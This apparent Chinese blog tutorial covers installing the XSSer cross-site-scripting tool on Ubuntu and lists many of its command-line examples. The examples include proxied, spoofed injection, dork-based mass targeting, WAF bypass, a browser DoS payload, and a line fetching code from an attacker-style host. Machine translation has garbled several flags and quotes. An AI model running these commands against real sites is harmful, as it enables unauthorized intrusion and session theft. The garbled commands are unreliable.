ubuntu安装xsser及使用

XSSer:自动化XSS漏洞检测及利用工具
参考https://xsser.03c8.net/

下载

  1. 访问网址,进行下载
    https://github.com/epsylon/xsser
  2. 解压到指定位置

配置

  1. 安装依赖,执行
    sudo apt-get install python-pycurl python-xmlbuilder python-beautifulsoup python-geoip
  2. cd到解压的指定位置
  3. python setup.py install
  4. 检查是否安装
    ./xsser -h
  5. 启动界面化工具
    ./xsser --gtk

使用

例子:

  • 查看帮助(可用命令):
    xsser -h(–help)

  • 检查最新的稳定版本:
    xsser --update

  • 启动GTK界面(GUI):
    xsser --gtk

  • 从URL简单注入:
    xsser -u“http://host.com”

  • 从文件简单注入,使用Tor代理和欺骗HTTP Referer头文件:
    xsser -i“file.txt”–proxy“http://127.0.0.1:8118”–referer“666.666.666.666”

  • URL多次注入,自动加载,建立反向连接(证明目标是100%易受攻击的)并显示统计信息:
    xsser -u“http://host.com”–auto --reverse-check -s

  • URL自动加载,使用Tor代理,使用“十六进制”编码,详细输出并将结果保存到文件(XSSreport.raw)中进行多次注入:
    xsser -u“http://host.com”–auto - -proxy“http://127.0.0.1:8118”–Hex --verbose --save

  • URL自动加载,使用字符编码突变(首先,将有效载荷更改为“十六进制”;其次,更改为’StringFromCharCode’;第三,重新编码为’十六进制’第二个),HTTP用户- 代理欺骗,将超时更改为“20”并使用多线程(5线程):
    xsser -u“http://host.com”–auto --Cem“Hex,Str,Hex”–user-agent“XSSer Pentesting Tool“ - 超时”20“ - 线程”5“

  • 来自File的高级注入,支付您的-own-代码并使用Unescape()字符编码绕过过滤器:
    xsser -i“urls.txt”–payload“!在这里输入您的注入代码!” --Une

  • 从Dork注入,选择“google”作为搜索引擎:
    xsser --De“google”-d“search.php?q =”

  • 从文件中提取的Dorks(由XSSer提供)并使用所有支持的搜索引擎(XSSer Storm!)注入:
    xsser -l --Da

  • 从爬行者注入深3页和4页来回顾(XSSer Spider!):
    xsser -c3 --Cw = 4 -u“http://host.com”

  • 从URL简单注入到POST参数(例如:密码),并带有统计结果:
    xsser -u“http://host.com/index.php”-p“target = login&user = admin&password = XSS”-s

  • 使用POST多次注入多个参数:
    xsser -u“http://host.com/index.php”-p“target = XSS&user = XSS&password = XSS”–auto

  • 从URL中简单注入,使用GET,在Cookie上注入,尝试使用DOM阴影空间(无服务器日志记录!),如果存在任何漏洞,则利用您的最终代码:
    xsser -u“http://host.com “-g”/ path?vuln = XSS“–Coo --Dom --Fp =”!在这里输入你的注入码!“

  • 使用GET简单注入URL,如果存在任何漏洞,则利用浏览器的DoS(Denegation Of Service)代码:
    xsser -u“http://host.com”-g“/ path?vuln = XSS” - DOS

  • 多次注入多个地方,从文件中提取目标,应用自动加载,将超时更改为“20”并使用多线程(5个线程),将请求之间的延迟增加到10秒,在HTTP USer-Agent,HTTP Referer和使用代理Tor,使用IP八进制混淆,使用统计结果并使用详细模式(实际播放模式!):
    xsser -i“list_of_url_targets.txt”–auto --timeout“20”–threads“5” -延迟“10” - Xsa --Xsr --Coo --proxy“http://127.0.0.1:8118”–Doo -s --verbose

  • 注入用户提供的一个XSS代码在一个-fake-image上:
    xsser --Imx“test.png”–payload“!在这里输入您的注入代码!”

  • 将dorking搜索(使用所有搜索引擎)的输出’positives’注入到XML文件中:
    xsser -d“login.php”–Da --xml“security_report_XSSer_Dork_login-php_allengines.xml”

  • 创建一个嵌入了标准XSS代码的Flash电影:
    xsser --fla“movie.swf”

  • 发送预检哈希以查看目标是否正在生成-false positive-回复:
    xsser -u“http://host.com”–hash

  • 发现使用启发式过滤的参数:
    xsser -u“http://host.com” - 启发式

  • 注入手动有效载荷后,在META标记(rfc2397)中使用Base64代码编码:
    xsser -u“http://host.com”-g“/ path?vuln = XSS”–payload“!在此输入您的注入代码! “ --B64

  • 利用自己的“自己的” - 远程代码 - 在使用自动模糊发现的有效载荷中:
    xsser -u“http://host.com”-g“/ path?vuln = XSS”–auto --Fr“https:/ /attacker_server.org/path/code.js”

  • 在使用-own-code并使用详细输出之前,应用Anti-antiXSS旁路(例如:Imperva):
    xsser -u“http://host.com”-g“/ path?vuln = XSS”–Imperva --payload“!在这里输入你的注射代码!” -v

你可能感兴趣的:(安全测试与安全管理)